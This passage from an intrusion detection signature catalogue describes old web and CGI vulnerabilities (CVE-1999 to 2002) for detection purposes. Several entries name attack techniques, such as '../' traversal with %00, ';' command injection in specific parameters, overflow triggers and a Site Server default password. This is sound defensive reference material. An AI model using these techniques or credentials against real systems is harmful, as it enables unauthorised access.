malicious user to submit a request which causes arbitrary commands to be executed on the host. The commands will be
executed with the privileges of the webserver process.
Signature ID: 197
Cobalt siteUserMod cgi vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0117 Bugtraq: 951 Nessus: 10253
Signature Description: The Cobalt RaQ is a 1U rackmount server product line developed by Cobalt Networks, Inc.
featuring a modified Red Hat Linux operating system and a proprietary GUI for server management. In Cobalt RaQ 1.1
to 3.0 (inclusive), a malicious site administrator of any account on the server can gain 'admin' (root) privileges. The
vulnerable CGI program is 'siteUserMod.cgi'. The attacker can then access or modify information pertaining to any
account on the system and remove all logs that record the modifications made by him.
Signature ID: 198
SIX Webboard's generate.cgi vulnerability
Threat Level: Severe
Industry ID: CVE-2001-1115 Bugtraq: 3175 Nessus: 10725
Signature Description: SIX-webboard is a Web bulletin board application developed by Sixhead. The Common
Gateway Interface (CGI) is a standard protocol for interfacing external application software with an information server,
commonly a web server. SIX-webboard 2.01 'generate.cgi' CGI program does not filter ".." and "/" from the user input.
This allows malicious users to enter arbitrary values in order to view or retrieve files not normally accessible to them
from the remote host. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 199
Sojourn File Access Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0180 Bugtraq: 1052 Nessus: 10349
Signature Description: Sojourn is a search engine similar to 'Yahoo!'. The Sojourn software includes the ability to
organize a website into categories. These categories can then be accessed via the sojourn.cgi Perl script. Each category
has an associated .txt file based on the category name. The program appends the .txt extension onto the contents of the
'cat' variable. By appending %00 to the end of the requested file, a malicious user can prevent the .txt extension from
being appended to the filename. The Generation Terrorists Designs & Concepts Sojourn 2.0 'sojourn.cgi' program
accepts the '../' string in the variable contents. This gives a malicious user read access to any file with the privileges of the
web server.
Signature ID: 200
Spin_client.cgi buffer overrun vulnerability
Threat Level: Warning
Nessus: 10393
Signature Description: SpinBox is an ad serving and hosting solution. The Common Gateway Interface (CGI) is a
standard protocol for interfacing external application software with an information server, commonly a web server.
There is a buffer overrun in the 'spin_client.cgi' CGI program, which will allow anyone to execute arbitrary commands
with the same privileges as the web server (root or nobody).
Signature ID: 201
SQLQHit Directory Structure Disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0986 Bugtraq: 3339
Signature Description: Structured Query Language (SQL) is a database computer language designed for the retrieval
and management of data in relational database management systems (RDBMS). Internet Information Server (IIS) is a
popular web server on the Microsoft Windows platform. The sqlqhit.asp sample file is used for performing web-based SQL
queries. In Internet Information Services server 4.0 running Index Server 2.0, a malicious user can reveal the path
information, file attributes, and possibly some lines of the file contents by directly calling 'sqlqhit.asp' with a CiScope
parameter set to (1) webinfo, (2) extended_fileinfo, (3) extended_webinfo, or (4) fileinfo.
Signature ID: 202
Thinking Arts ES.One Directory Traversal Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0305 Bugtraq: 2385 Nessus: 10639
Signature Description: Thinking Arts is a Devon (UK) based web design company specializing in art related ecommerce
websites. Thinking Arts 'ES.One' package is one such solution. A directory traversal vulnerability in 'store.cgi'
in the 'Thinking Arts ES.One' 1.0 package allows remote attackers to read arbitrary files via a .. (dot dot) character
sequence in the StartID parameter.
Signature ID: 203
Redhat Stronghold File System Disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0868 Bugtraq: 3577 Nessus: 10803
Signature Description: In RedHat Stronghold 2.3 to 3.0 (inclusive), if restricted access to the server status report is
not enabled, then a remote attacker can gain access to sensitive system files including the 'httpd.conf' file. Remote
attackers can retrieve these files via an HTTP GET request to (1) stronghold-info or (2) stronghold-status. These URLs are
not enabled in the default installation and must be manually enabled for the system to be vulnerable.
Signature ID: 204
Reading CGI script sources using /cgi-bin-sdb vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0868 Bugtraq: 1658 Nessus: 10503
Signature Description: Linux is a Unix-like computer operating system. SUSE is a retail operating system based on the
Linux kernel, produced in Germany and owned by Novell, Inc. The default configuration of Apache 1.3.12 in SuSE
Linux 6.3 and 6.4 has the directory '/cgi-bin-sdb' as an Alias of '/cgi-bin'. This allows remote attackers to read source
code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/. This can give an attacker
valuable information that can be used in subsequent attacks.
Signature ID: 205
SWC Overflow vulnerability
Threat Level: Warning
Nessus: 10493
Signature Description: A web counter or hit counter is a computer software program that indicates the number of
visitors, or hits, a particular webpage has received. The Common Gateway Interface (CGI) is a standard protocol for
interfacing external application software with an information server, commonly a web server. 'Simple Web Counter' is
a web counter CGI written by Ross Thompson. The Simple Web Counter CGI 1.1 and prior is vulnerable to a buffer
overflow when issued a too long value to the 'ctr=' argument. This will allow anyone to execute arbitrary commands
with the same privileges as the web server (root or nobody).
Signature ID: 206
Multiple Vendor test-cgi Directory Listing Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0070 Bugtraq: 2003 Nessus: 10282
Signature Description: A webserver is a computer program that is responsible for accepting HTTP requests and serving
HTTP responses along with optional data contents such as HTML documents and linked objects. The NCSA
HTTPd was a web server originally developed at the NCSA. The Apache HTTP Server is a well-known webserver
whose code was based on the NCSA HTTPd server. NCSA httpd 1.5.2a and prior and Apache Software Foundation Apache
1.0.5 and prior come with a CGI sample shell script called 'test-cgi' that is located by default in the '/cgi-bin' directory. This
script is vulnerable to directory disclosure as it does not properly enclose echo command parameters in quotes. The
echo command expands the '*' character to give a directory listing of the specified directory with the privileges of the
web server. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 208
Tomcat's /admin is world readable vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0672 Bugtraq: 1548 Nessus: 10477
Signature Description: Apache Software Foundation Tomcat is a Servlet container. Tomcat implements the Java
Servlet and the JavaServer Pages (JSP) specifications from Sun Microsystems, providing a "pure Java" HTTP web
server environment for the Java applications. In Apache Software Foundation Tomcat 3.0 and 3.1, the
'/admin/contextAdmin/contextAdmin.html' page can be accessed by anyone. This allows an attacker to add new
contexts to the Tomcat web server, and potentially read arbitrary files on the server with the privileges of the web
server. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 209
Jakarta Tomcat Path Disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0759 Bugtraq: 1531 Nessus: 10807
Signature Description: Apache Software Foundation Tomcat is a Servlet container. Tomcat implements the Java
Servlet and the JavaServer Pages (JSP) specifications from Sun Microsystems, providing a "pure Java" HTTP web
server environment for Java applications. In Apache Software Foundation Tomcat 3.0 and 3.1 under the Apache web server,
the physical path information of a file is revealed in the error message when a remote attacker requests a URL that does not
exist. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 210
Tomcat's snoop servlet gives too much information vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0760 Bugtraq: 1532 Nessus: 10478
Signature Description: Apache Software Foundation Tomcat is a Servlet container. Tomcat implements the Java
Servlet and the JavaServer Pages (JSP) specifications from Sun Microsystems, providing a "pure Java" HTTP web
server environment for Java applications. A vulnerability exists in the snoop servlet portion of Apache Software
Foundation Tomcat 3.0 and 3.1. Sensitive information about file paths, OS information, etc. is revealed in the error
message on requesting a nonexistent '.snp' file. This can give an attacker valuable information that can be used in
subsequent attacks.
Signature ID: 211
ASP/ASA source using Microsoft Translate: f bug vulnerability
Threat Level: Critical
Industry ID: CVE-2000-0778 Bugtraq: 1578 Nessus: 10491
Signature Description: Internet Information Services (formerly 'Server') is a set of Internet-based services for
webservers on the Microsoft Windows platform. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file
types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, process them
accordingly, and then execute them on the server. It is possible to force the server to send back the source of a known
script file to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a
trailing slash '/' is appended to the end of the URL. This can give an attacker valuable information which can be used in
subsequent attacks.
Signature ID: 212
Tarantella TTAWebTop.CGI Arbitrary File Viewing Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0805 CVE-2002-0203 Bugtraq: 2890 Nessus: 10696
Signature Description: Tarantella Enterprise 3 is a tool for centralized web interface based management of data and
applications for Unix and Linux based distributions. The 'ttawebtop.cgi' is a CGI script included with the Tarantella
Enterprise 3 3.0 to 3.20.0. It does not sufficiently validate input. As a result, using a '../' character sequence it is possible
for a remote user to traverse the directory structure, and view any file that is readable by the webserver process. This
can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 213
Access to Upload.cgi
Threat Level: Information
Nessus: 10290
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. 'Upload.cgi' is a CGI program that is used to
upload files on to a web server. Many such programs having the same name are vulnerable due to insufficient parsing
of input. The vulnerabilities include file upload to arbitrary locations, file upload without authentication, etc. This
signature detects the presence of "Upload.cgi".
Signature ID: 214
O'Reilly's Website Pro uploader.exe CGI vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0177 Bugtraq: 1611 Nessus: 10291
Signature Description: A computer program that is responsible for accepting HTTP requests from clients and serving
them HTTP responses along with optional data contents is known as a webserver. The Common Gateway Interface
(CGI) is a standard protocol for interfacing external application software with an information server, commonly a web
server. O'Reilly's Website Pro is a webserver. A program 'uploader.exe' is present in the /cgi-win directory of this
server. 'uploader.exe' in versions of O'Reilly's Website pro software before 1.1g allows an attacker to upload arbitrary
CGI programs and then execute them using CGI requests.
Signature ID: 215
WEB-CGI ustorekeeper.pl directory traversal vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0466 Bugtraq: 2536 Nessus: 10645
Signature Description: UStorekeeper is an Online Shopping System from Microburst Technologies. A directory traversal
vulnerability exists in ustorekeeper 1.0.1 to 1.8.1 (inclusive) as the script fails to properly validate user-supplied input.
This allows remote attackers to read arbitrary files via a '..' (dot dot) character sequence in the 'file' parameter. The files
are displayed with the privilege level of the webserver user.
Signature ID: 216
View_source CGI Information Disclosure Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0174 Bugtraq: 2251 Nessus: 10294
Signature Description: UNIX is a computer operating system originally developed by a group of AT&T employees at
Bell Labs. Skunkware is a variant of the UNIX Operating System distributed by Santa Cruz Operations (SCO).
'view-source' is a script included with the httpd package bundled with Skunkware 2.0. A problem with the view-source script
allows access to restricted files remotely. The problem occurs in the handling of the '../' (dot dot slash) character sequence
by the view-source script. This allows an attacker to traverse the directory structure on a web server and view any file
that is readable by the webserver process. This can give an attacker valuable information that can be used in subsequent
attacks.
Signature ID: 217
OmniHTTPd visadmin exploit vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0970 Bugtraq: 1808 Nessus: 10295
Signature Description: A computer program that is responsible for accepting HTTP requests from clients and serving
them HTTP responses along with optional data contents is known as a webserver. The Common Gateway Interface
(CGI) is a standard protocol for interfacing external application software with an information server, commonly a web
server. OmniHTTPD is a web server offered by Omnicron for the MS Windows platform. OmniHTTPD 1.1 to 2.0
Alpha 1 (inclusive) are vulnerable to a denial of service attack. When the "visadmin.exe" program is executed via CGI
with the argument "user=guest", it creates temporary files until the hard drive fills. The files then need to be manually
removed before anything can be written to the disk.
Signature ID: 218
VirusWall's catinfo BUFFER overflow vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0432 Bugtraq: 2579 Nessus: 10650
Signature Description: Interscan Viruswall (Linux) is a virus scanning software package distributed and maintained by
Trend Micro for the Linux operating system. It is designed to scan for virus occurrences in both incoming and outgoing
traffic via SMTP, FTP, and HTTP at the gateway of the network. A problem with the software package could lead to
elevated privileges on the scanning system. The management interface used with the Interscan Viruswall uses several
programs in a cgi directory that contain buffer overflows. Additionally, the http daemon used to execute these programs
runs as root, and does not sufficiently control access to the programs, allowing a user to execute them directly.
Therefore, it is possible for a remote user to exploit buffer overflows in the cgi programs packaged with Interscan
Viruswall, and execute arbitrary commands as root on the system hosting Viruswall.
Signature ID: 219
W3-msql overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0012 Bugtraq: 898 Nessus: 10296
Signature Description: A Computer Database is a structured collection of records or data that is stored in a computer
system. A Relational database management system (RDBMS) is computer software that is based on the relational
model designed for the purpose of managing databases. Mini SQL (mSQL) is a lightweight relational database
management system. w3-msql is a cgi-program shipped with Mini-SQL which acts as a web interface for mSQL. In
Hughes Technologies Mini SQL (mSQL) 2.0.11 there are a number of buffer overflow vulnerabilities in the w3-msql
program, one of which is exploitable. The exploitable buffer is the content-length field and the stack is overflowed
inside of a scanf() call. As a result, it is possible to execute arbitrary code remotely as the uid of the webserver (usually
nobody).
Signature ID: 220
Way-board CGI Access vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0214 Bugtraq: 2370 Nessus: 10610
Signature Description: A message board system is a program that allows people to leave public messages on a website.
Way-Board is a popular Korean message board system. In Way-Board 2.0, a remote user could gain read access to
known files outside the root directory where Way-Board resides by requesting a known file in a specially crafted URL
that terminates with a '%00' sequence.
Signature ID: 221
WebActive world readable log file vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0642 Bugtraq: 1497 Nessus: 10470
Signature Description: A computer program that is responsible for accepting HTTP requests from clients and serving
them HTTP responses along with optional data contents is known as a webserver. WEBactive is an HTTP server by
ITAfrica. The default configuration of WebActive HTTP Server 1.0 stores the web access log file, 'active.log', in the
web root directory. This allows remote attackers to view the logs by directly requesting the page. An attacker may use
this to obtain valuable information about the site including visitor details and popularity information.
Signature ID: 222
Misconfigured Webcart information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Default
installations of Mountain Network Systems Inc. WebCart 1.0 are vulnerable to information disclosure due to
misconfiguration of access policies. The program writes customer order information in remotely accessible text
files. This information includes credit card details and other sensitive information. This signature detects access to
'/webcart/orders/' file.
Signature ID: 223
Misconfigured Webcart information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Default
installations of Mountain Network Systems Inc. WebCart 1.0 are vulnerable to information disclosure due to
misconfiguration of access policies. The program writes customer order information in remotely accessible text
files. This information includes credit card details and other sensitive information. This signature detects access to
'/webcart/carts/' directory.
Signature ID: 224
Misconfigured Webcart information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Default
installations of Mountain Network Systems Inc. WebCart 1.0 are vulnerable to information disclosure due to
misconfiguration of access policies. The program writes customer order information in remotely accessible text
files. This information includes credit card details and other sensitive information. This signature detects access to
'/webcart/config/' directory.
Signature ID: 225
Misconfigured Webcart information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Default
installations of Mountain Network Systems Inc. WebCart 1.0 are vulnerable to information disclosure due to
misconfiguration of access policies. The program writes customer order information in remotely accessible text
files. This information includes credit card details and other sensitive information. This signature detects access to
'/orders/carts/' file.
Signature ID: 226
Misconfigured Webcart information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Default
installations of Mountain Network Systems Inc. WebCart 1.0 are vulnerable to information disclosure due to
misconfiguration of access policies. The program writes customer order information in remotely accessible text
files. This information includes credit card details and other sensitive information. This signature detects access to
'/config/clients.txt' file.
Signature ID: 227
Misconfigured Webcart information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Default
installations of Mountain Network Systems Inc. WebCart 1.0 are vulnerable to information disclosure due to
misconfiguration of access policies. The program writes customer order information in remotely accessible text
files. This information includes credit card details and other sensitive information. This signature detects access to
'/orders/import.txt' file.
Signature ID: 229
Webdist CGI command execution vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0039 Bugtraq: 374 Nessus: 10299
Signature Description: IRIX is a computer operating system developed by Silicon Graphics, Inc. to run natively on
their 32-bit and 64-bit MIPS architecture workstations and servers. The Common Gateway Interface (CGI) is a
standard protocol for interfacing external application software with an information server, commonly a web server. A
vulnerability exists in the 'webdist.cgi' CGI program as included by Silicon Graphics in their IRIX operating system
versions 5.0 to 6.3 (inclusive). The 'webdist.cgi' CGI program allows remote attackers to execute arbitrary commands
with the privileges of the web server process via shell metacharacters in the 'distloc' parameter.
Signature ID: 231
Buffer overflow vulnerability in WebSitePro webfind.exe
Threat Level: Warning
Industry ID: CVE-2000-0622 Bugtraq: 1487 Nessus: 10475
Signature Description: A computer program that is responsible for accepting HTTP requests from clients and serving
them HTTP responses along with optional data contents is known as a webserver. The Common Gateway Interface
(CGI) is a standard protocol for interfacing external application software with an information server, commonly a web
server. O'Reilly's Website Pro is a webserver. Buffer overflow in Webfind CGI program in O'Reilly WebSite
Professional web server 2.3.18 to 2.4.9 (inclusive) allows remote attackers to execute arbitrary commands as root via a
URL containing a long "keywords" parameter.
Signature ID: 232
WEBgais Remote Command Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0176 Bugtraq: 2058 Nessus: 10300
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. WEBgais is a script that provides a web
interface to the "gais" (Global Area Intelligent Search) search engine tool developed by WebGAIS Development Team.
Due to improper input checking in WebGAIS 1.0 to 1.0 B2 (inclusive), '/cgi-bin/webgais' script allows a remote
attacker to execute commands at the privilege level of the web server. An attacker can execute commands using the ';'
character due to improper validation of 'query' argument before calling Perl "system" command. The specially crafted
attack packet must include the parameters output=subject and domain=paragraph.
Signature ID: 233
Websendmail Command execution vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0196 Bugtraq: 2077 Nessus: 10301
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. WEBgais is a package that provides a web
interface to the "gais" (Global Area Intelligent Search) search engine tool developed by WebGAIS Development Team.
Due to improper input checking in WebGAIS 1.0 to 1.0 B2 (inclusive), 'websendmail' script allows a remote attacker to
execute commands at the privilege level of the web server. An attacker can execute commands in POST method
request using the ';' character, due to improper validation of the 'receiver' argument before calling the Perl "open" command.
Signature ID: 234
Vulnerable WebSite pro can reveal the physical path of web directory
Threat Level: Warning
Industry ID: CVE-2000-0066 Bugtraq: 932 Nessus: 10303
Signature Description: A computer program that is responsible for accepting HTTP requests from clients and serving
them HTTP responses along with optional data contents is known as a webserver. The Common Gateway Interface
(CGI) is a standard protocol for interfacing external application software with an information server, commonly a web
server. O'Reilly's Website Pro is a web server. O'Reilly WebSite Professional web server 2.3.18 to 2.4.9 (inclusive)
allows remote attackers to determine the complete absolute directory of web directories via a malformed URL request.
This information is revealed in the HTTP 404 error response from the vulnerable server. This can give an attacker
valuable information which can be used in subsequent attacks.
Signature ID: 236
WebSpeed remote configuration vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0127 Bugtraq: 969 Nessus: 10304
Signature Description: Progress WebSpeed is an Internet Transaction Processing (ITP) web application which allows
for database connectivity and transaction management. The WebSpeed WSISA Messenger Administration Utility is
remotely accessible from any web browser. In Progress WebSpeed 3.0, this utility displays sensitive web server
statistics and grants capabilities to administer certain functions of the web server, and can be accessed without any
authentication requirements whatsoever. This misconfiguration may lead to a hacker gaining complete control of the
website.
Signature ID: 237
Directory Traversal Vulnerability in webspirs.cgi
Threat Level: Severe
Industry ID: CVE-2001-0211 Bugtraq: 2362 Nessus: 10616
Signature Description: SilverPlatter ERL is a system for providing hard disk access to electronic reference library
databases via the Data Exchange Protocol (DXP). SilverPlatter WebSPIRS is SilverPlatter's most popular web search
interface to these electronic reference library databases. In SilverPlatter WebSPIRS 3.3.1, a remote attacker can gain read access
SilverPlatter's most popular search interface. In SilverPlatter WebSPIRS 3.3.1, a remote attacker can gain read access
to known files outside the directory where SilverPlatter WebSPIRS resides. Requesting a specially crafted URL with
the sp.nextform parameter containing '../' character sequence along with the known file name will disclose the contents
of the requested file. This can give an attacker valuable information which can be used in subsequent attacks.
Signature ID: 238
Whois_raw.cgi arbitrary command execution vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1063 Bugtraq: 304 Nessus: 10306
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. WHOIS is a query/response protocol which is
widely used for querying an official database in order to determine the owner of a domain name, an IP address, or an
autonomous system number on the Internet. CdomainFree is a simple CGI Perl script which can be used to gather the
complete whois information for a domain name as well as the availability of a domain name in popular domain
extensions like .com, .net, .org and .edu. A vulnerability in a CGI script called 'whois_raw.cgi' included with
CdomainFree 1.0 to 2.4 (inclusive) allows remote malicious users to run any executable already existing on the machine
via shell meta characters in the fqdn parameter.
Signature ID: 239
Windmail.exe CGI access detected vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0242 Bugtraq: 1073 Nessus: 10365
Signature Description: GeoCel WindMail is a command-line mailer that can be integrated with Perl CGI applications to
create form-mail capability for a website. WindMail 3.0 and prior versions can be used to retrieve files via email and
execute arbitrary commands with the privileges of the webserver. The exact impact of the attack is based on access
restrictions and the mode of WindMail being used.
Signature ID: 241
Wwwboard passwd.txt access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0953 Bugtraq: 649,12453 Nessus: 10321
Signature Description: The WWWBoard package is a popular web based discussion board by Matt Wright. The
administration area of the WWWBoard package requires a username and password for authentication. WWWBoard
Alpha 2.0 and 2.1 store encrypted passwords in a password file called 'passwd.txt' that is created in the web root
directory. As a result, an attacker may obtain the contents of this file and decode the password to modify the remote
WWWBoard.
Signature ID: 242
Wwwwais CGI Access vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0223 Bugtraq: 2292 Nessus: 10597
Signature Description: WWWWAIS is a small ANSI C program that acts as gateway between programs that create
indexed catalogs of files and a forms-capable World-Wide Web browser. In wwwwais.c 2.5, a remote user supplying
excess input (> 1024 characters) in a GET request can cause a heap overflow. This slows down the affected webserver,
causing a denial of service. The remote attacker can execute arbitrary commands with the privilege level of the
webserver user if the attack packet is properly structured.
Signature ID: 243
YaBB CGI arbitrary file access vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0853 Bugtraq: 1668 Nessus: 10512
Signature Description: A message board system is a program that allows people to leave public messages on a website.
YaBB.pl, a web-based bulletin board script, stores board postings in numbered text files. The numbered file name is
specified in the call to YaBB.pl in the variable num. Before retrieving the file, YaBB will append a .txt extension to the
value given to the num field. Due to an input validation problem in YaBB Bulletin Board 9.1.2000, remote attackers can read
arbitrary files via a '..' (dot dot) character sequence as value of num variable. The '.txt' extension can be avoided by
appending %00 to <file>.
Signature ID: 244
SilverStream directory listing vulnerability
Threat Level: Warning
Nessus: 10846
Signature Description: The SilverStream Application Server is a comprehensive, J2EE certified platform for building
and deploying enterprise-class Web applications. This product is currently maintained by Novell. If the 'disable
directory listing' option is turned off, any web user is allowed to see the directory contents. This can give an attacker
valuable information which can be used in subsequent attacks.
Signature ID: 246
ServletExec 4.1 ISAPI Physical Path Disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0892 Bugtraq: 4793 Nessus: 10960
Signature Description: ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS. It runs with IIS on
Microsoft Windows NT/2000/XP systems. The default configuration of NewAtlanta ServletExec ISAPI 4.1 discloses
the absolute path to the webroot directory when a specially crafted request without a trailing filename is received. The
specially crafted request is made to 'servlet/com.newatlanta.servletexec.JSP10Servlet/'.
Signature ID: 248
Ping.asp based denial of service attack
Threat Level: Warning
Nessus: 10968
Signature Description: Active Server Pages (ASP) is Microsoft's server-side script engine for dynamically-generated
web pages. Some versions of the 'ping.asp' program allow a malicious user to launch a ping flood against the local
machine or another connected system. This will result in a Denial of Service (DoS) condition.
Signature ID: 249
JServ Cross Site Scripting Vulnerability
Threat Level: Warning
Nessus: 10957
Signature Description: Apache JServ consists of two functional components called mod_jserv and a servlet engine.
mod_jserv is an Apache Server module and directs incoming requests for Java Servlets to a servlet engine. The Apache
JServ Protocol (AJP) facilitates communication between the two components. Older versions of JServ (including the
version shipped with Oracle9i App Server v1.0.2) are vulnerable to a cross site scripting attack using a request for a
non-existent .JSP file.
Signature ID: 250
Apache Windows PHP Arbitrary File access and binary execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-2029 Bugtraq: 3786 Nessus: 10839
Signature Description: PHP is a computer scripting language. A configuration vulnerability exists for PHP.EXE cgi as
shipped with Apache Software Foundation Apache 1.3.11 to 1.3.20 for Windows 95/98/NT/2000 platforms. Setting
ScriptAlias for '/php/' to 'c:/php/' creates a security vulnerability. This allows arbitrary files to be read from the host.
The remote user can also run all executables in the PHP directory.
Signature ID: 252
Oracle 9iAS mod_plsql cross site scripting vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1636 Nessus: 10853
Signature Description: The Oracle Application Server is a platform for developing, deploying, and integrating
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle9i Application Server is
vulnerable to cross-site scripting attack, caused by improper filtering of HTML script tags. A remote attacker could
create a malicious URL link containing embedded script which would be executed in the victim's Web browser within
the security context of the hosting site, once the link is clicked.
Signature ID: 253
Oracle 9iAS mod_plsql Buffer Overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1216 Bugtraq: 3726 Nessus: 10840
Signature Description: The Oracle Application Server is a platform for developing, deploying, and integrating
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9i Application Server
comes with an Apache-based web server and support for environments such as SOAP, PL/SQL, XSQL and JSP. The
PL/SQL Apache module for Oracle 9iAS provides functionality for remote administration of the Database Access
Descriptors and access to help pages. A remotely exploitable buffer overflow exists in the PL/SQL Apache module. A
request for an excessively long help page can cause stack variables to be overwritten. This allows an attacker to execute
arbitrary code. The attacker-supplied code is executed with SYSTEM level privileges on Microsoft Windows systems.
Signature ID: 254
Oracle 9iAS Jsp Source code disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0562 Bugtraq: 4034 Nessus: 10852
Signature Description: The Oracle Application Server is a platform for developing, deploying, and integrating
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9i Application
Server(9iAS) comes with an Apache-based web server and support for environments such as SOAP, PL/SQL, XSQL
and JSP. Three files are created when a user requests a JSP page: a 'jsp_StaticText.class' file, a
'.class' file and a '.java' file. In Oracle 9iAS, all these files are stored in the '/_pages'
directory tree. A user can request a '.jsp' file and then access the corresponding '.java' file
to see its source code. This can reveal sensitive information like database authentication information. Also, a
file called 'globals.jsa' is available to users without restriction. Sensitive information including user
names and passwords is stored in this file. Information obtained by an attacker can then be used in further attacks.
Signature ID: 255
Oracle 9iAS Java Process Manager vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0563 Bugtraq: 4293 Nessus: 10851,10848
Signature Description: The Oracle Application Server is a platform for developing, deploying, and integrating
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9i Application
Server(9iAS) comes with an Apache-based web server and support for environments such as SOAP, PL/SQL, XSQL
and JSP. In Oracle 9i Application Server 1.0.2.x, anonymous users can access sensitive services without authentication
if default settings are used. 'oprocmgr-service', which can be used to control Java processes, is one such
service. Using this process, the user can list, start or stop the processes running on the remote host. Stopping a process
can result in a Denial of Service(DoS) condition.
Signature ID: 258
Oracle 9iAS Dynamic Monitoring Services vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0563 Bugtraq: 4293 Nessus: 10848
Signature Description: The Oracle Application Server is a platform for developing, deploying, and integrating
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9i Application
Server(9iAS) comes with an Apache-based web server and support for environments such as SOAP, PL/SQL, XSQL
and JSP. In Oracle 9i Application Server, if the default settings are used, remote unauthenticated attackers can directly
access the Apache HTTP server Dynamic Monitoring Services, which will disclose sensitive information about the
server, resulting in a loss of confidentiality. Information obtained by an attacker can then be used in further attacks.
Signature ID: 259
Oracle 9iAS XSQLConfig.xml File disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0568 Bugtraq: 4290 Nessus: 10855,11224
Signature Description: The Oracle Application Server is a platform for developing, deploying, and integrating
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9iAS includes a
configuration file called 'XSQLConfig.xml'. The configuration file contains sensitive information such
as database user names and passwords. If default configuration is used, this file is accessible to remote clients without
any authentication. It is possible for malicious users to access and read the file through a virtual directory. Information
obtained by attacker can then be used in further attacks.
Signature ID: 260
MS Site Server Information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1769 Bugtraq: 3998 Nessus: 11018
Signature Description: Microsoft Site Server is designed to run on Microsoft Windows NT Server platforms. It
provides a means for users on a corporate intranet to share, publish, and find information. Site Server Commerce
Edition incorporates the same features as well as providing an interface for e-commerce sites to interact and conduct
business with customers and suppliers. Microsoft Site Server 3.0 prior to SP4 has a default user called
'LDAP_Anonymous' with a default password of 'LdapPassword_1'. This user account is
added to the 'Guests' group, and is given the 'Log on locally' privilege. Using this account, an attacker can gain access
to sensitive information on the host. This information can be used in subsequent attacks. This signature detects access
to the 'persmbr/' directory.
Signature ID: 261
MS Site Server Information disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1769 Bugtraq: 3998 Nessus: 11018
Signature Description: Microsoft Site Server is designed to run on Microsoft Windows NT Server platforms. It
provides a means for users on a corporate intranet to share, publish, and find information. Site Server Commerce
Edition incorporates the same features as well as providing an interface for e-commerce sites to interact and conduct
business with customers and suppliers. Microsoft Site Server 3.0 prior to SP4 has a default user called
'LDAP_Anonymous' with a default password of 'LdapPassword_1'. This user account is
added to the 'Guests' group, and is given the 'Log on locally' privilege. Using this account, an attacker can gain access
